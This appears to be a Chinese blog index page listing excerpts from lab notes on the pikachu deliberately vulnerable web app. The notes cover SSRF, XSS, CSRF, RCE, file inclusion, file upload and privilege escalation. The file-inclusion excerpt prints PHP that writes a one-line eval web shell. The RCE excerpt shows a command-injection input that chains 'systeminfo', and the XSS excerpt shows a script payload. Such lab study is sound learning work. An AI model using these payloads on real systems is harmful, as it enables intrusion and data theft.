![](https://img-blog.csdnimg.cn/20190927151117521.png?x-oss-process=image/resize,m_fixed,h_224,w_224)
pikachu靶场-实验笔记
pikachu靶场漏洞,实验过程记录
Alsn86
这个作者很懒,什么都没留下…
展开
-
pikachu之SSRF
pikachu之SSRF概述SSRF(curl)看一下源代码,服务器会去请求传入的url,并把请求到的内容结果,输出到前端由于curl可以执行的不止是http协议,还有ftp,telnet等,这样就可以通过传入恶意的url参数,使用服务器的身份进行恶意操作...原创 2021-12-23 14:39:58 · 2687 阅读 · 0 评论 -
pikachu之URL重定向
pikachu之URL重定向点击不同的a标签,会跳转到不同的页面看一下源代码http://127.0.0.1/pikachu-master/vul/urlredirect/urlredirect.php?url=http://www.baidu.com将链接发送给别人,如果url=http://www.baidu.com是钓鱼网网站,那么点击的人就会中招,跳转到钓鱼网站...原创 2021-12-23 10:48:20 · 2013 阅读 · 0 评论 -
pikachu之PHP反序列化
pikachu之PHP反序列化概述原创 2021-12-23 10:24:59 · 375 阅读 · 0 评论 -
pikachu之敏感信息泄露
pikachu之敏感信息泄露源码里面有账号密码信息原创 2021-12-22 16:19:29 · 386 阅读 · 0 评论 -
pikachu之目录遍历
pikachu之目录遍历原创 2021-12-22 16:14:55 · 364 阅读 · 0 评论 -
pikachu之Over permission
pikachu之Over permission水平越权登陆lucy的账号,在查看个人信息时,将username修改为lili,可以平行越权查看lili的个人信息垂直越权登陆管理员用户账号,抓取删除某用户的请求包退出登录,登陆普通用户的账号,并将上面删除用户的数据包,替换为普通用户的cookie,重放数据包,发现成功删除了用户名为2的用户...原创 2021-12-22 15:35:56 · 231 阅读 · 0 评论 -
pikachu之Unsafe Fileupload
pikachu之Unsafe Fileupload感觉有些混乱,但是就是总结为 改后缀,改image/png,图片马。。。。client check前端校验抓包改名绕过MIME type合成图片马filename改为php后缀getimagesize啥都验证了.就上传图片马,然后使用文件包含进行利用...原创 2021-12-22 15:07:19 · 2266 阅读 · 0 评论 -
pikachu之Unsafe Filedownload
pikachu之Unsafe Filedownload抓包原创 2021-12-22 14:30:51 · 178 阅读 · 0 评论 -
pikachu之 File Inclusion
pikachu之 File Inclusion准备好一段创建一句话木马的php代码,后缀改为jpg<?php$mima="'".'ma'."'";touch ("testshell.php");$file = fopen("testshell.php","w");$write='<?php @eval($_POST['.$mima.']); ?>';echo fwrite($file,$write);fclose($file);echo "已经创建一句话php文件";原创 2021-12-10 16:25:49 · 1747 阅读 · 0 评论 -
pikachu之RCE
pikachu之 RCEexec "ping"输入 423.1.1.1 || systeminfo由于ping 423.1.1.1是错误的 所以 || 会执行systeminfo看一下源代码,没有过滤,直接进行拼接执行了然后把shell_exec执行的结果,输出到前端了exec "eval"看了下前端,没看出名堂看一下源码,发现直接把txt放到 eval里执行了输入 phpinfo();输入echo "123123";输入 echo '<script>aler原创 2021-12-08 17:30:37 · 117 阅读 · 0 评论 -
pikachu之CSRF
pikachu之CSRFCSRF(get)登陆后,进入修改个人信息界面,点击submit,看到发送的请求在受害者登陆的情况下,构造以下链接,若受害者点击了,便可以修改他的个人信息http://127.0.0.1/pikachu-master/vul/csrf/csrfget/csrf_get_edit.php?sex=boy&phonenum=18626545453&add=chain2222&email=vince%40pikachu.com&submit=su原创 2021-12-06 11:12:20 · 114 阅读 · 0 评论 -
pikachu之Cross-Site-Scripting
pikachu之Cross-Site-Scripting反射型xss(get)抓包情况使用123</p><script>alert(666)</script>可以完成闭合由于输入框的输入长度有限制,所以修改为100,或者直接在get参数里输入也可以弹窗反射性xss(post)先用admin/123456登陆一下系统,为了获得cookie,如果想要尝试,可以在xss完成后插入beef的恶意代码来获取cookie抓包查看使用123</p&原创 2021-11-23 11:40:48 · 3917 阅读 · 0 评论 -
pikachu之暴力破解
pikachu之暴力破解基于表单的暴力破解笛卡尔积模式爆破爆破完成验证码绕过(on server)图片验证码可以重复使用笛卡尔积模式爆破就可以爆破完成验证码绕过(on client)验证码是前端javascript生成并且前端校验后端对验证码不理睬的使用笛卡尔积模式爆破就可以爆破完成token防爆破抓包,发现有token,只有token正确,后端才对提交的用户名和密码进行校验相应包里面有token按照以下方式爆破,由于burpsuite功能设置,如原创 2021-11-01 17:16:20 · 115 阅读 · 0 评论